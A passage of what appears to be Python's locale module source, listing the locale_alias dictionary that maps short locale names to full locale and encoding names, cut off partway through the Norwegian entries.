'sr_RS.UTF-8@latin' # updated 'sr_yu' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8@latin' # updated 'sr_yu.utf8@cyrillic' -> 'sr_CS.UTF-8' to 'sr_RS.UTF-8' # updated 'sr_yu@cyrillic' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8' # locale_alias = { 'a3': 'a3_AZ.KOI8-C', 'a3_az': 'a3_AZ.KOI8-C', 'a3_az.koi8c': 'a3_AZ.KOI8-C', 'af': 'af_ZA.ISO8859-1', 'af_za': 'af_ZA.ISO8859-1', 'af_za.iso88591': 'af_ZA.ISO8859-1', 'am': 'am_ET.UTF-8', 'am_et': 'am_ET.UTF-8', 'american': 'en_US.ISO8859-1', 'american.iso88591': 'en_US.ISO8859-1', 'ar': 'ar_AA.ISO8859-6', 'ar_aa': 'ar_AA.ISO8859-6', 'ar_aa.iso88596': 'ar_AA.ISO8859-6', 'ar_ae': 'ar_AE.ISO8859-6', 'ar_ae.iso88596': 'ar_AE.ISO8859-6', 'ar_bh': 'ar_BH.ISO8859-6', 'ar_bh.iso88596': 'ar_BH.ISO8859-6', 'ar_dz': 'ar_DZ.ISO8859-6', 'ar_dz.iso88596': 'ar_DZ.ISO8859-6', 'ar_eg': 'ar_EG.ISO8859-6', 'ar_eg.iso88596': 'ar_EG.ISO8859-6', 'ar_iq': 'ar_IQ.ISO8859-6', 'ar_iq.iso88596': 'ar_IQ.ISO8859-6', 'ar_jo': 'ar_JO.ISO8859-6', 'ar_jo.iso88596': 'ar_JO.ISO8859-6', 'ar_kw': 'ar_KW.ISO8859-6', 'ar_kw.iso88596': 'ar_KW.ISO8859-6', 'ar_lb': 'ar_LB.ISO8859-6', 'ar_lb.iso88596': 'ar_LB.ISO8859-6', 'ar_ly': 'ar_LY.ISO8859-6', 'ar_ly.iso88596': 'ar_LY.ISO8859-6', 'ar_ma': 'ar_MA.ISO8859-6', 'ar_ma.iso88596': 'ar_MA.ISO8859-6', 'ar_om': 'ar_OM.ISO8859-6', 'ar_om.iso88596': 'ar_OM.ISO8859-6', 'ar_qa': 'ar_QA.ISO8859-6', 'ar_qa.iso88596': 'ar_QA.ISO8859-6', 'ar_sa': 'ar_SA.ISO8859-6', 'ar_sa.iso88596': 'ar_SA.ISO8859-6', 'ar_sd': 'ar_SD.ISO8859-6', 'ar_sd.iso88596': 'ar_SD.ISO8859-6', 'ar_sy': 'ar_SY.ISO8859-6', 'ar_sy.iso88596': 'ar_SY.ISO8859-6', 'ar_tn': 'ar_TN.ISO8859-6', 'ar_tn.iso88596': 'ar_TN.ISO8859-6', 'ar_ye': 'ar_YE.ISO8859-6', 'ar_ye.iso88596': 'ar_YE.ISO8859-6', 'arabic': 'ar_AA.ISO8859-6', 'arabic.iso88596': 'ar_AA.ISO8859-6', 'as': 'as_IN.UTF-8', 'az': 'az_AZ.ISO8859-9E', 'az_az': 'az_AZ.ISO8859-9E', 'az_az.iso88599e': 'az_AZ.ISO8859-9E', 'be': 'be_BY.CP1251', 'be@latin': 'be_BY.UTF-8@latin', 'be_by': 'be_BY.CP1251', 'be_by.cp1251': 'be_BY.CP1251', 'be_by.microsoftcp1251': 'be_BY.CP1251', 'be_by.utf8@latin': 'be_BY.UTF-8@latin', 'be_by@latin': 'be_BY.UTF-8@latin', 'bg': 'bg_BG.CP1251', 'bg_bg': 'bg_BG.CP1251', 'bg_bg.cp1251': 'bg_BG.CP1251', 'bg_bg.iso88595': 'bg_BG.ISO8859-5', 'bg_bg.koi8r': 'bg_BG.KOI8-R', 'bg_bg.microsoftcp1251': 'bg_BG.CP1251', 'bn_in': 'bn_IN.UTF-8', 'bokmal': 'nb_NO.ISO8859-1', 'bokm\xe5l': 'nb_NO.ISO8859-1', 'br': 'br_FR.ISO8859-1', 'br_fr': 'br_FR.ISO8859-1', 'br_fr.iso88591': 'br_FR.ISO8859-1', 'br_fr.iso885914': 'br_FR.ISO8859-14', 'br_fr.iso885915': 'br_FR.ISO8859-15', 'br_fr.iso885915@euro': 'br_FR.ISO8859-15', 'br_fr.utf8@euro': 'br_FR.UTF-8', 'br_fr@euro': 'br_FR.ISO8859-15', 'bs': 'bs_BA.ISO8859-2', 'bs_ba': 'bs_BA.ISO8859-2', 'bs_ba.iso88592': 'bs_BA.ISO8859-2', 'bulgarian': 'bg_BG.CP1251', 'c': 'C', 'c-french': 'fr_CA.ISO8859-1', 'c-french.iso88591': 'fr_CA.ISO8859-1', 'c.en': 'C', 'c.iso88591': 'en_US.ISO8859-1', 'c_c': 'C', 'c_c.c': 'C', 'ca': 'ca_ES.ISO8859-1', 'ca_ad': 'ca_AD.ISO8859-1', 'ca_ad.iso88591': 'ca_AD.ISO8859-1', 'ca_ad.iso885915': 'ca_AD.ISO8859-15', 'ca_ad.iso885915@euro': 'ca_AD.ISO8859-15', 'ca_ad.utf8@euro': 'ca_AD.UTF-8', 'ca_ad@euro': 'ca_AD.ISO8859-15', 'ca_es': 'ca_ES.ISO8859-1', 'ca_es.iso88591': 'ca_ES.ISO8859-1', 'ca_es.iso885915': 'ca_ES.ISO8859-15', 'ca_es.iso885915@euro': 'ca_ES.ISO8859-15', 'ca_es.utf8@euro': 'ca_ES.UTF-8', 'ca_es@euro': 'ca_ES.ISO8859-15', 'ca_fr': 'ca_FR.ISO8859-1', 'ca_fr.iso88591': 'ca_FR.ISO8859-1', 'ca_fr.iso885915': 'ca_FR.ISO8859-15', 'ca_fr.iso885915@euro': 'ca_FR.ISO8859-15', 'ca_fr.utf8@euro': 'ca_FR.UTF-8', 'ca_fr@euro': 'ca_FR.ISO8859-15', 'ca_it': 'ca_IT.ISO8859-1', 'ca_it.iso88591': 'ca_IT.ISO8859-1', 'ca_it.iso885915': 'ca_IT.ISO8859-15', 'ca_it.iso885915@euro': 'ca_IT.ISO8859-15', 'ca_it.utf8@euro': 'ca_IT.UTF-8', 'ca_it@euro': 'ca_IT.ISO8859-15', 'catalan': 'ca_ES.ISO8859-1', 'cextend': 'en_US.ISO8859-1', 'cextend.en': 'en_US.ISO8859-1', 'chinese-s': 'zh_CN.eucCN', 'chinese-t': 'zh_TW.eucTW', 'croatian': 'hr_HR.ISO8859-2', 'cs': 'cs_CZ.ISO8859-2', 'cs_cs': 'cs_CZ.ISO8859-2', 'cs_cs.iso88592': 'cs_CS.ISO8859-2', 'cs_cz': 'cs_CZ.ISO8859-2', 'cs_cz.iso88592': 'cs_CZ.ISO8859-2', 'cy': 'cy_GB.ISO8859-1', 'cy_gb': 'cy_GB.ISO8859-1', 'cy_gb.iso88591': 'cy_GB.ISO8859-1', 'cy_gb.iso885914': 'cy_GB.ISO8859-14', 'cy_gb.iso885915': 'cy_GB.ISO8859-15', 'cy_gb@euro': 'cy_GB.ISO8859-15', 'cz': 'cs_CZ.ISO8859-2', 'cz_cz': 'cs_CZ.ISO8859-2', 'czech': 'cs_CZ.ISO8859-2', 'da': 'da_DK.ISO8859-1', 'da.iso885915': 'da_DK.ISO8859-15', 'da_dk': 'da_DK.ISO8859-1', 'da_dk.88591': 'da_DK.ISO8859-1', 'da_dk.885915': 'da_DK.ISO8859-15', 'da_dk.iso88591': 'da_DK.ISO8859-1', 'da_dk.iso885915': 'da_DK.ISO8859-15', 'da_dk@euro': 'da_DK.ISO8859-15', 'danish': 'da_DK.ISO8859-1', 'danish.iso88591': 'da_DK.ISO8859-1', 'dansk': 'da_DK.ISO8859-1', 'de': 'de_DE.ISO8859-1', 'de.iso885915': 'de_DE.ISO8859-15', 'de_at': 'de_AT.ISO8859-1', 'de_at.iso88591': 'de_AT.ISO8859-1', 'de_at.iso885915': 'de_AT.ISO8859-15', 'de_at.iso885915@euro': 'de_AT.ISO8859-15', 'de_at.utf8@euro': 'de_AT.UTF-8', 'de_at@euro': 'de_AT.ISO8859-15', 'de_be': 'de_BE.ISO8859-1', 'de_be.iso88591': 'de_BE.ISO8859-1', 'de_be.iso885915': 'de_BE.ISO8859-15', 'de_be.iso885915@euro': 'de_BE.ISO8859-15', 'de_be.utf8@euro': 'de_BE.UTF-8', 'de_be@euro': 'de_BE.ISO8859-15', 'de_ch': 'de_CH.ISO8859-1', 'de_ch.iso88591': 'de_CH.ISO8859-1', 'de_ch.iso885915': 'de_CH.ISO8859-15', 'de_ch@euro': 'de_CH.ISO8859-15', 'de_de': 'de_DE.ISO8859-1', 'de_de.88591': 'de_DE.ISO8859-1', 'de_de.885915': 'de_DE.ISO8859-15', 'de_de.885915@euro': 'de_DE.ISO8859-15', 'de_de.iso88591': 'de_DE.ISO8859-1', 'de_de.iso885915': 'de_DE.ISO8859-15', 'de_de.iso885915@euro': 'de_DE.ISO8859-15', 'de_de.utf8@euro': 'de_DE.UTF-8', 'de_de@euro': 'de_DE.ISO8859-15', 'de_lu': 'de_LU.ISO8859-1', 'de_lu.iso88591': 'de_LU.ISO8859-1', 'de_lu.iso885915': 'de_LU.ISO8859-15', 'de_lu.iso885915@euro': 'de_LU.ISO8859-15', 'de_lu.utf8@euro': 'de_LU.UTF-8', 'de_lu@euro': 'de_LU.ISO8859-15', 'deutsch': 'de_DE.ISO8859-1', 'dutch': 'nl_NL.ISO8859-1', 'dutch.iso88591': 'nl_BE.ISO8859-1', 'ee': 'ee_EE.ISO8859-4', 'ee_ee': 'ee_EE.ISO8859-4', 'ee_ee.iso88594': 'ee_EE.ISO8859-4', 'eesti': 'et_EE.ISO8859-1', 'el': 'el_GR.ISO8859-7', 'el_gr': 'el_GR.ISO8859-7', 'el_gr.iso88597': 'el_GR.ISO8859-7', 'el_gr@euro': 'el_GR.ISO8859-15', 'en': 'en_US.ISO8859-1', 'en.iso88591': 'en_US.ISO8859-1', 'en_au': 'en_AU.ISO8859-1', 'en_au.iso88591': 'en_AU.ISO8859-1', 'en_be': 'en_BE.ISO8859-1', 'en_be@euro': 'en_BE.ISO8859-15', 'en_bw': 'en_BW.ISO8859-1', 'en_bw.iso88591': 'en_BW.ISO8859-1', 'en_ca': 'en_CA.ISO8859-1', 'en_ca.iso88591': 'en_CA.ISO8859-1', 'en_gb': 'en_GB.ISO8859-1', 'en_gb.88591': 'en_GB.ISO8859-1', 'en_gb.iso88591': 'en_GB.ISO8859-1', 'en_gb.iso885915': 'en_GB.ISO8859-15', 'en_gb@euro': 'en_GB.ISO8859-15', 'en_hk': 'en_HK.ISO8859-1', 'en_hk.iso88591': 'en_HK.ISO8859-1', 'en_ie': 'en_IE.ISO8859-1', 'en_ie.iso88591': 'en_IE.ISO8859-1', 'en_ie.iso885915': 'en_IE.ISO8859-15', 'en_ie.iso885915@euro': 'en_IE.ISO8859-15', 'en_ie.utf8@euro': 'en_IE.UTF-8', 'en_ie@euro': 'en_IE.ISO8859-15', 'en_in': 'en_IN.ISO8859-1', 'en_nz': 'en_NZ.ISO8859-1', 'en_nz.iso88591': 'en_NZ.ISO8859-1', 'en_ph': 'en_PH.ISO8859-1', 'en_ph.iso88591': 'en_PH.ISO8859-1', 'en_sg': 'en_SG.ISO8859-1', 'en_sg.iso88591': 'en_SG.ISO8859-1', 'en_uk': 'en_GB.ISO8859-1', 'en_us': 'en_US.ISO8859-1', 'en_us.88591': 'en_US.ISO8859-1', 'en_us.885915': 'en_US.ISO8859-15', 'en_us.iso88591': 'en_US.ISO8859-1', 'en_us.iso885915': 'en_US.ISO8859-15', 'en_us.iso885915@euro': 'en_US.ISO8859-15', 'en_us@euro': 'en_US.ISO8859-15', 'en_us@euro@euro': 'en_US.ISO8859-15', 'en_za': 'en_ZA.ISO8859-1', 'en_za.88591': 'en_ZA.ISO8859-1', 'en_za.iso88591': 'en_ZA.ISO8859-1', 'en_za.iso885915': 'en_ZA.ISO8859-15', 'en_za@euro': 'en_ZA.ISO8859-15', 'en_zw': 'en_ZW.ISO8859-1', 'en_zw.iso88591': 'en_ZW.ISO8859-1', 'eng_gb': 'en_GB.ISO8859-1', 'eng_gb.8859': 'en_GB.ISO8859-1', 'english': 'en_EN.ISO8859-1', 'english.iso88591': 'en_EN.ISO8859-1', 'english_uk': 'en_GB.ISO8859-1', 'english_uk.8859': 'en_GB.ISO8859-1', 'english_united-states': 'en_US.ISO8859-1', 'english_united-states.437': 'C', 'english_us': 'en_US.ISO8859-1', 'english_us.8859': 'en_US.ISO8859-1', 'english_us.ascii': 'en_US.ISO8859-1', 'eo': 'eo_XX.ISO8859-3', 'eo_eo': 'eo_EO.ISO8859-3', 'eo_eo.iso88593': 'eo_EO.ISO8859-3', 'eo_xx': 'eo_XX.ISO8859-3', 'eo_xx.iso88593': 'eo_XX.ISO8859-3', 'es': 'es_ES.ISO8859-1', 'es_ar': 'es_AR.ISO8859-1', 'es_ar.iso88591': 'es_AR.ISO8859-1', 'es_bo': 'es_BO.ISO8859-1', 'es_bo.iso88591': 'es_BO.ISO8859-1', 'es_cl': 'es_CL.ISO8859-1', 'es_cl.iso88591': 'es_CL.ISO8859-1', 'es_co': 'es_CO.ISO8859-1', 'es_co.iso88591': 'es_CO.ISO8859-1', 'es_cr': 'es_CR.ISO8859-1', 'es_cr.iso88591': 'es_CR.ISO8859-1', 'es_do': 'es_DO.ISO8859-1', 'es_do.iso88591': 'es_DO.ISO8859-1', 'es_ec': 'es_EC.ISO8859-1', 'es_ec.iso88591': 'es_EC.ISO8859-1', 'es_es': 'es_ES.ISO8859-1', 'es_es.88591': 'es_ES.ISO8859-1', 'es_es.iso88591': 'es_ES.ISO8859-1', 'es_es.iso885915': 'es_ES.ISO8859-15', 'es_es.iso885915@euro': 'es_ES.ISO8859-15', 'es_es.utf8@euro': 'es_ES.UTF-8', 'es_es@euro': 'es_ES.ISO8859-15', 'es_gt': 'es_GT.ISO8859-1', 'es_gt.iso88591': 'es_GT.ISO8859-1', 'es_hn': 'es_HN.ISO8859-1', 'es_hn.iso88591': 'es_HN.ISO8859-1', 'es_mx': 'es_MX.ISO8859-1', 'es_mx.iso88591': 'es_MX.ISO8859-1', 'es_ni': 'es_NI.ISO8859-1', 'es_ni.iso88591': 'es_NI.ISO8859-1', 'es_pa': 'es_PA.ISO8859-1', 'es_pa.iso88591': 'es_PA.ISO8859-1', 'es_pa.iso885915': 'es_PA.ISO8859-15', 'es_pa@euro': 'es_PA.ISO8859-15', 'es_pe': 'es_PE.ISO8859-1', 'es_pe.iso88591': 'es_PE.ISO8859-1', 'es_pe.iso885915': 'es_PE.ISO8859-15', 'es_pe@euro': 'es_PE.ISO8859-15', 'es_pr': 'es_PR.ISO8859-1', 'es_pr.iso88591': 'es_PR.ISO8859-1', 'es_py': 'es_PY.ISO8859-1', 'es_py.iso88591': 'es_PY.ISO8859-1', 'es_py.iso885915': 'es_PY.ISO8859-15', 'es_py@euro': 'es_PY.ISO8859-15', 'es_sv': 'es_SV.ISO8859-1', 'es_sv.iso88591': 'es_SV.ISO8859-1', 'es_sv.iso885915': 'es_SV.ISO8859-15', 'es_sv@euro': 'es_SV.ISO8859-15', 'es_us': 'es_US.ISO8859-1', 'es_us.iso88591': 'es_US.ISO8859-1', 'es_uy': 'es_UY.ISO8859-1', 'es_uy.iso88591': 'es_UY.ISO8859-1', 'es_uy.iso885915': 'es_UY.ISO8859-15', 'es_uy@euro': 'es_UY.ISO8859-15', 'es_ve': 'es_VE.ISO8859-1', 'es_ve.iso88591': 'es_VE.ISO8859-1', 'es_ve.iso885915': 'es_VE.ISO8859-15', 'es_ve@euro': 'es_VE.ISO8859-15', 'estonian': 'et_EE.ISO8859-1', 'et': 'et_EE.ISO8859-15', 'et_ee': 'et_EE.ISO8859-15', 'et_ee.iso88591': 'et_EE.ISO8859-1', 'et_ee.iso885913': 'et_EE.ISO8859-13', 'et_ee.iso885915': 'et_EE.ISO8859-15', 'et_ee.iso88594': 'et_EE.ISO8859-4', 'et_ee@euro': 'et_EE.ISO8859-15', 'eu': 'eu_ES.ISO8859-1', 'eu_es': 'eu_ES.ISO8859-1', 'eu_es.iso88591': 'eu_ES.ISO8859-1', 'eu_es.iso885915': 'eu_ES.ISO8859-15', 'eu_es.iso885915@euro': 'eu_ES.ISO8859-15', 'eu_es.utf8@euro': 'eu_ES.UTF-8', 'eu_es@euro': 'eu_ES.ISO8859-15', 'fa': 'fa_IR.UTF-8', 'fa_ir': 'fa_IR.UTF-8', 'fa_ir.isiri3342': 'fa_IR.ISIRI-3342', 'fi': 'fi_FI.ISO8859-15', 'fi.iso885915': 'fi_FI.ISO8859-15', 'fi_fi': 'fi_FI.ISO8859-15', 'fi_fi.88591': 'fi_FI.ISO8859-1', 'fi_fi.iso88591': 'fi_FI.ISO8859-1', 'fi_fi.iso885915': 'fi_FI.ISO8859-15', 'fi_fi.iso885915@euro': 'fi_FI.ISO8859-15', 'fi_fi.utf8@euro': 'fi_FI.UTF-8', 'fi_fi@euro': 'fi_FI.ISO8859-15', 'finnish': 'fi_FI.ISO8859-1', 'finnish.iso88591': 'fi_FI.ISO8859-1', 'fo': 'fo_FO.ISO8859-1', 'fo_fo': 'fo_FO.ISO8859-1', 'fo_fo.iso88591': 'fo_FO.ISO8859-1', 'fo_fo.iso885915': 'fo_FO.ISO8859-15', 'fo_fo@euro': 'fo_FO.ISO8859-15', 'fr': 'fr_FR.ISO8859-1', 'fr.iso885915': 'fr_FR.ISO8859-15', 'fr_be': 'fr_BE.ISO8859-1', 'fr_be.88591': 'fr_BE.ISO8859-1', 'fr_be.iso88591': 'fr_BE.ISO8859-1', 'fr_be.iso885915': 'fr_BE.ISO8859-15', 'fr_be.iso885915@euro': 'fr_BE.ISO8859-15', 'fr_be.utf8@euro': 'fr_BE.UTF-8', 'fr_be@euro': 'fr_BE.ISO8859-15', 'fr_ca': 'fr_CA.ISO8859-1', 'fr_ca.88591': 'fr_CA.ISO8859-1', 'fr_ca.iso88591': 'fr_CA.ISO8859-1', 'fr_ca.iso885915': 'fr_CA.ISO8859-15', 'fr_ca@euro': 'fr_CA.ISO8859-15', 'fr_ch': 'fr_CH.ISO8859-1', 'fr_ch.88591': 'fr_CH.ISO8859-1', 'fr_ch.iso88591': 'fr_CH.ISO8859-1', 'fr_ch.iso885915': 'fr_CH.ISO8859-15', 'fr_ch@euro': 'fr_CH.ISO8859-15', 'fr_fr': 'fr_FR.ISO8859-1', 'fr_fr.88591': 'fr_FR.ISO8859-1', 'fr_fr.iso88591': 'fr_FR.ISO8859-1', 'fr_fr.iso885915': 'fr_FR.ISO8859-15', 'fr_fr.iso885915@euro': 'fr_FR.ISO8859-15', 'fr_fr.utf8@euro': 'fr_FR.UTF-8', 'fr_fr@euro': 'fr_FR.ISO8859-15', 'fr_lu': 'fr_LU.ISO8859-1', 'fr_lu.88591': 'fr_LU.ISO8859-1', 'fr_lu.iso88591': 'fr_LU.ISO8859-1', 'fr_lu.iso885915': 'fr_LU.ISO8859-15', 'fr_lu.iso885915@euro': 'fr_LU.ISO8859-15', 'fr_lu.utf8@euro': 'fr_LU.UTF-8', 'fr_lu@euro': 'fr_LU.ISO8859-15', 'fran\xe7ais': 'fr_FR.ISO8859-1', 'fre_fr': 'fr_FR.ISO8859-1', 'fre_fr.8859': 'fr_FR.ISO8859-1', 'french': 'fr_FR.ISO8859-1', 'french.iso88591': 'fr_CH.ISO8859-1', 'french_france': 'fr_FR.ISO8859-1', 'french_france.8859': 'fr_FR.ISO8859-1', 'ga': 'ga_IE.ISO8859-1', 'ga_ie': 'ga_IE.ISO8859-1', 'ga_ie.iso88591': 'ga_IE.ISO8859-1', 'ga_ie.iso885914': 'ga_IE.ISO8859-14', 'ga_ie.iso885915': 'ga_IE.ISO8859-15', 'ga_ie.iso885915@euro': 'ga_IE.ISO8859-15', 'ga_ie.utf8@euro': 'ga_IE.UTF-8', 'ga_ie@euro': 'ga_IE.ISO8859-15', 'galego': 'gl_ES.ISO8859-1', 'galician': 'gl_ES.ISO8859-1', 'gd': 'gd_GB.ISO8859-1', 'gd_gb': 'gd_GB.ISO8859-1', 'gd_gb.iso88591': 'gd_GB.ISO8859-1', 'gd_gb.iso885914': 'gd_GB.ISO8859-14', 'gd_gb.iso885915': 'gd_GB.ISO8859-15', 'gd_gb@euro': 'gd_GB.ISO8859-15', 'ger_de': 'de_DE.ISO8859-1', 'ger_de.8859': 'de_DE.ISO8859-1', 'german': 'de_DE.ISO8859-1', 'german.iso88591': 'de_CH.ISO8859-1', 'german_germany': 'de_DE.ISO8859-1', 'german_germany.8859': 'de_DE.ISO8859-1', 'gl': 'gl_ES.ISO8859-1', 'gl_es': 'gl_ES.ISO8859-1', 'gl_es.iso88591': 'gl_ES.ISO8859-1', 'gl_es.iso885915': 'gl_ES.ISO8859-15', 'gl_es.iso885915@euro': 'gl_ES.ISO8859-15', 'gl_es.utf8@euro': 'gl_ES.UTF-8', 'gl_es@euro': 'gl_ES.ISO8859-15', 'greek': 'el_GR.ISO8859-7', 'greek.iso88597': 'el_GR.ISO8859-7', 'gu_in': 'gu_IN.UTF-8', 'gv': 'gv_GB.ISO8859-1', 'gv_gb': 'gv_GB.ISO8859-1', 'gv_gb.iso88591': 'gv_GB.ISO8859-1', 'gv_gb.iso885914': 'gv_GB.ISO8859-14', 'gv_gb.iso885915': 'gv_GB.ISO8859-15', 'gv_gb@euro': 'gv_GB.ISO8859-15', 'he': 'he_IL.ISO8859-8', 'he_il': 'he_IL.ISO8859-8', 'he_il.cp1255': 'he_IL.CP1255', 'he_il.iso88598': 'he_IL.ISO8859-8', 'he_il.microsoftcp1255': 'he_IL.CP1255', 'hebrew': 'iw_IL.ISO8859-8', 'hebrew.iso88598': 'iw_IL.ISO8859-8', 'hi': 'hi_IN.ISCII-DEV', 'hi_in': 'hi_IN.ISCII-DEV', 'hi_in.isciidev': 'hi_IN.ISCII-DEV', 'hne': 'hne_IN.UTF-8', 'hr': 'hr_HR.ISO8859-2', 'hr_hr': 'hr_HR.ISO8859-2', 'hr_hr.iso88592': 'hr_HR.ISO8859-2', 'hrvatski': 'hr_HR.ISO8859-2', 'hu': 'hu_HU.ISO8859-2', 'hu_hu': 'hu_HU.ISO8859-2', 'hu_hu.iso88592': 'hu_HU.ISO8859-2', 'hungarian': 'hu_HU.ISO8859-2', 'icelandic': 'is_IS.ISO8859-1', 'icelandic.iso88591': 'is_IS.ISO8859-1', 'id': 'id_ID.ISO8859-1', 'id_id': 'id_ID.ISO8859-1', 'in': 'id_ID.ISO8859-1', 'in_id': 'id_ID.ISO8859-1', 'is': 'is_IS.ISO8859-1', 'is_is': 'is_IS.ISO8859-1', 'is_is.iso88591': 'is_IS.ISO8859-1', 'is_is.iso885915': 'is_IS.ISO8859-15', 'is_is@euro': 'is_IS.ISO8859-15', 'iso-8859-1': 'en_US.ISO8859-1', 'iso-8859-15': 'en_US.ISO8859-15', 'iso8859-1': 'en_US.ISO8859-1', 'iso8859-15': 'en_US.ISO8859-15', 'iso_8859_1': 'en_US.ISO8859-1', 'iso_8859_15': 'en_US.ISO8859-15', 'it': 'it_IT.ISO8859-1', 'it.iso885915': 'it_IT.ISO8859-15', 'it_ch': 'it_CH.ISO8859-1', 'it_ch.iso88591': 'it_CH.ISO8859-1', 'it_ch.iso885915': 'it_CH.ISO8859-15', 'it_ch@euro': 'it_CH.ISO8859-15', 'it_it': 'it_IT.ISO8859-1', 'it_it.88591': 'it_IT.ISO8859-1', 'it_it.iso88591': 'it_IT.ISO8859-1', 'it_it.iso885915': 'it_IT.ISO8859-15', 'it_it.iso885915@euro': 'it_IT.ISO8859-15', 'it_it.utf8@euro': 'it_IT.UTF-8', 'it_it@euro': 'it_IT.ISO8859-15', 'italian': 'it_IT.ISO8859-1', 'italian.iso88591': 'it_IT.ISO8859-1', 'iu': 'iu_CA.NUNACOM-8', 'iu_ca': 'iu_CA.NUNACOM-8', 'iu_ca.nunacom8': 'iu_CA.NUNACOM-8', 'iw': 'he_IL.ISO8859-8', 'iw_il': 'he_IL.ISO8859-8', 'iw_il.iso88598': 'he_IL.ISO8859-8', 'ja': 'ja_JP.eucJP', 'ja.jis': 'ja_JP.JIS7', 'ja.sjis': 'ja_JP.SJIS', 'ja_jp': 'ja_JP.eucJP', 'ja_jp.ajec': 'ja_JP.eucJP', 'ja_jp.euc': 'ja_JP.eucJP', 'ja_jp.eucjp': 'ja_JP.eucJP', 'ja_jp.iso-2022-jp': 'ja_JP.JIS7', 'ja_jp.iso2022jp': 'ja_JP.JIS7', 'ja_jp.jis': 'ja_JP.JIS7', 'ja_jp.jis7': 'ja_JP.JIS7', 'ja_jp.mscode': 'ja_JP.SJIS', 'ja_jp.pck': 'ja_JP.SJIS', 'ja_jp.sjis': 'ja_JP.SJIS', 'ja_jp.ujis': 'ja_JP.eucJP', 'japan': 'ja_JP.eucJP', 'japanese': 'ja_JP.eucJP', 'japanese-euc': 'ja_JP.eucJP', 'japanese.euc': 'ja_JP.eucJP', 'japanese.sjis': 'ja_JP.SJIS', 'jp_jp': 'ja_JP.eucJP', 'ka': 'ka_GE.GEORGIAN-ACADEMY', 'ka_ge': 'ka_GE.GEORGIAN-ACADEMY', 'ka_ge.georgianacademy': 'ka_GE.GEORGIAN-ACADEMY', 'ka_ge.georgianps': 'ka_GE.GEORGIAN-PS', 'ka_ge.georgianrs': 'ka_GE.GEORGIAN-ACADEMY', 'kl': 'kl_GL.ISO8859-1', 'kl_gl': 'kl_GL.ISO8859-1', 'kl_gl.iso88591': 'kl_GL.ISO8859-1', 'kl_gl.iso885915': 'kl_GL.ISO8859-15', 'kl_gl@euro': 'kl_GL.ISO8859-15', 'km_kh': 'km_KH.UTF-8', 'kn': 'kn_IN.UTF-8', 'kn_in': 'kn_IN.UTF-8', 'ko': 'ko_KR.eucKR', 'ko_kr': 'ko_KR.eucKR', 'ko_kr.euc': 'ko_KR.eucKR', 'ko_kr.euckr': 'ko_KR.eucKR', 'korean': 'ko_KR.eucKR', 'korean.euc': 'ko_KR.eucKR', 'ks': 'ks_IN.UTF-8', 'ks_in@devanagari': 'ks_IN@devanagari.UTF-8', 'kw': 'kw_GB.ISO8859-1', 'kw_gb': 'kw_GB.ISO8859-1', 'kw_gb.iso88591': 'kw_GB.ISO8859-1', 'kw_gb.iso885914': 'kw_GB.ISO8859-14', 'kw_gb.iso885915': 'kw_GB.ISO8859-15', 'kw_gb@euro': 'kw_GB.ISO8859-15', 'ky': 'ky_KG.UTF-8', 'ky_kg': 'ky_KG.UTF-8', 'lithuanian': 'lt_LT.ISO8859-13', 'lo': 'lo_LA.MULELAO-1', 'lo_la': 'lo_LA.MULELAO-1', 'lo_la.cp1133': 'lo_LA.IBM-CP1133', 'lo_la.ibmcp1133': 'lo_LA.IBM-CP1133', 'lo_la.mulelao1': 'lo_LA.MULELAO-1', 'lt': 'lt_LT.ISO8859-13', 'lt_lt': 'lt_LT.ISO8859-13', 'lt_lt.iso885913': 'lt_LT.ISO8859-13', 'lt_lt.iso88594': 'lt_LT.ISO8859-4', 'lv': 'lv_LV.ISO8859-13', 'lv_lv': 'lv_LV.ISO8859-13', 'lv_lv.iso885913': 'lv_LV.ISO8859-13', 'lv_lv.iso88594': 'lv_LV.ISO8859-4', 'mai': 'mai_IN.UTF-8', 'mi': 'mi_NZ.ISO8859-1', 'mi_nz': 'mi_NZ.ISO8859-1', 'mi_nz.iso88591': 'mi_NZ.ISO8859-1', 'mk': 'mk_MK.ISO8859-5', 'mk_mk': 'mk_MK.ISO8859-5', 'mk_mk.cp1251': 'mk_MK.CP1251', 'mk_mk.iso88595': 'mk_MK.ISO8859-5', 'mk_mk.microsoftcp1251': 'mk_MK.CP1251', 'ml': 'ml_IN.UTF-8', 'mr': 'mr_IN.UTF-8', 'mr_in': 'mr_IN.UTF-8', 'ms': 'ms_MY.ISO8859-1', 'ms_my': 'ms_MY.ISO8859-1', 'ms_my.iso88591': 'ms_MY.ISO8859-1', 'mt': 'mt_MT.ISO8859-3', 'mt_mt': 'mt_MT.ISO8859-3', 'mt_mt.iso88593': 'mt_MT.ISO8859-3', 'nb': 'nb_NO.ISO8859-1', 'nb_no': 'nb_NO.ISO8859-1', 'nb_no.88591': 'nb_NO.ISO8859-1', 'nb_no.iso88591': 'nb_NO.ISO8859-1', 'nb_no.iso885915': 'nb_NO.ISO8859-15', 'nb_no@euro': 'nb_NO.ISO8859-15', 'nl': 'nl_NL.ISO8859-1', 'nl.iso885915': 'nl_NL.ISO8859-15', 'nl_be': 'nl_BE.ISO8859-1', 'nl_be.88591': 'nl_BE.ISO8859-1', 'nl_be.iso88591': 'nl_BE.ISO8859-1', 'nl_be.iso885915': 'nl_BE.ISO8859-15', 'nl_be.iso885915@euro': 'nl_BE.ISO8859-15', 'nl_be.utf8@euro': 'nl_BE.UTF-8', 'nl_be@euro': 'nl_BE.ISO8859-15', 'nl_nl': 'nl_NL.ISO8859-1', 'nl_nl.88591': 'nl_NL.ISO8859-1', 'nl_nl.iso88591': 'nl_NL.ISO8859-1', 'nl_nl.iso885915': 'nl_NL.ISO8859-15', 'nl_nl.iso885915@euro': 'nl_NL.ISO8859-15', 'nl_nl.utf8@euro': 'nl_NL.UTF-8', 'nl_nl@euro': 'nl_NL.ISO8859-15', 'nn': 'nn_NO.ISO8859-1', 'nn_no': 'nn_NO.ISO8859-1', 'nn_no.88591': 'nn_NO.ISO8859-1', 'nn_no.iso88591': 'nn_NO.ISO8859-1', 'nn_no.iso885915': 'nn_NO.ISO8859-15', 'nn_no@euro': 'nn_NO.ISO8859-15', 'no': 'no_NO.ISO8859-1', 'no@nynorsk': 'ny_NO.ISO8859-1', 'no_no': 'no_NO.ISO8859-1', 'no_no.88591': 'no_NO.ISO8859-1', 'no_no.iso88591': 'no_NO.ISO8859-1', 'no_no.iso885915': 'no_NO.ISO8859-15', 'no_no.iso88591@bokmal': 'no_NO.ISO8859-1', 'no_no.iso88591@nynorsk': 'no_NO.ISO8859-1', 'no_no@euro': 